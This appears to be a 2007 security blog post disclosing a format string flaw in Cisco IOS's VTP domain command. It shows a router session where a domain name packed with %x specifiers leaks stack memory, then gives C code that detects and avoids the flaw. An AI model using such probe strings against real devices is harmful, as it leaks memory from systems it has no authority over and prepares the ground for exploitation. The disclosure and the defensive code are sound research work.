Tuesday, April 10, 2007

Format String Attacks on IOS

Something I came across while reproducing FX's VTP overflow vulnerability (http://www.phenoelit.de/stuff/CiscoVTP.txt). It looks like IOS does not implement the %n format specifier in its libc implementation, so no format string exploits :( , however we can still use %x's to dump memory addresses. Below is a session dump of the bug, under the latest ipbase image -

Password:
reptile>en
Password:
reptile#vlan ?
database Configure VLAN database
reptile#vlan database
reptile(vlan)#?
VLAN database editing buffer manipulation commands:
abort Exit mode without applying the changes
apply Apply current changes and bump revision number
exit Apply changes, bump revision number, and exit mode
no Negate a command or set its defaults
reset Abandon current changes and reread current database
show Show database information
vlan Add, delete, or modify values associated with a single VLAN
vtp Perform VTP administrative functions.
reptile(vlan)#vtp ?
client Set the device to client mode.
domain Set the name of the VTP administrative domain.
password Set the password for the VTP administrative domain.
pruning Set the administrative domain to permit pruning.
server Set the device to server mode.
transparent Set the device to transparent mode.
v2-mode Set the administrative domain to V2 mode.
reptile(vlan)#
reptile(vlan)#
reptile(vlan)#vtp domain test(%x)(%x)(%x)(%x)(%x)(%x)(%x)(%x)(%x)(%x)
Changing VTP domain name from test to (FFFFFFFF)(0)(839A3538)(0)(0)(8270652F)(FFFFFFFF)(839A34E0)(4)(839A3780)
reptile(vlan)#
reptile(vlan)#
reptile(vlan)#exit
APPLY completed.
Exiting....
reptile#exit
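The session above shows the classic symptom of a printf-family call that takes attacker-controlled text as its format string: each %x in the domain name pulls one word off the stack into the "Changing VTP domain name" message. The C below is an added example (not Cisco's code, and not from the linked advisory) showing the defensive side: a check that counts conversion directives in an untrusted name, and a setter that builds the status message from a fixed format so the name is only ever consumed as a %s argument. The function names and the message text are my own choices; the sample input is the string typed in the session.

```c
#include <stdio.h>
#include <string.h>

/* Count printf-style conversion directives in an untrusted string.
 * "%%" is an escaped literal percent sign and is not counted.
 * Any other '%' starts a directive (%x, %n, %s, ...) that a
 * printf-family function would try to satisfy from the stack. */
size_t count_format_directives(const char *s)
{
    size_t n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {      /* "%%" -> literal '%' */
            s++;
            continue;
        }
        n++;
    }
    return n;
}

/* The pattern the session exposes looks like this (shown as a
 * comment only, since it is the bug, not the fix):
 *
 *     printf(name);                  // name is the format string
 *
 * The hardened form below keeps the format string constant and passes
 * the name as data. As defence in depth it also refuses names that
 * contain directives, so a caller can log the rejected attempt.
 * Returns 0 on success, -1 if the name was rejected. */
int set_domain_safe(char *msg, size_t msgsz, const char *old_name,
                    const char *new_name)
{
    if (count_format_directives(new_name) != 0)
        return -1;
    snprintf(msg, msgsz, "Changing VTP domain name from %s to %s",
             old_name, new_name);
    return 0;
}

int main(void)
{
    /* Constructed input: the exact string typed in the session. */
    const char *probe = "test(%x)(%x)(%x)(%x)(%x)(%x)(%x)(%x)(%x)(%x)";
    char msg[128];

    printf("directives in probe: %zu\n", count_format_directives(probe));

    if (set_domain_safe(msg, sizeof msg, "test", probe) == -1)
        printf("rejected: name contains format directives\n");

    if (set_domain_safe(msg, sizeof msg, "test", "lab") == 0)
        printf("%s\n", msg);   /* name printed as data, never interpreted */
    return 0;
}
```

Compiling with -Wformat-security (or -Wformat=2 on GCC/Clang) flags the commented-out unsafe call at build time; the runtime check is the complement for inputs that arrive over the network rather than the console.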

1 comment:

Anonymous said...

Interesting.
Have you looked at the printf format string parsing itself? Quite often some things are broken there too so that exploitation is still possible.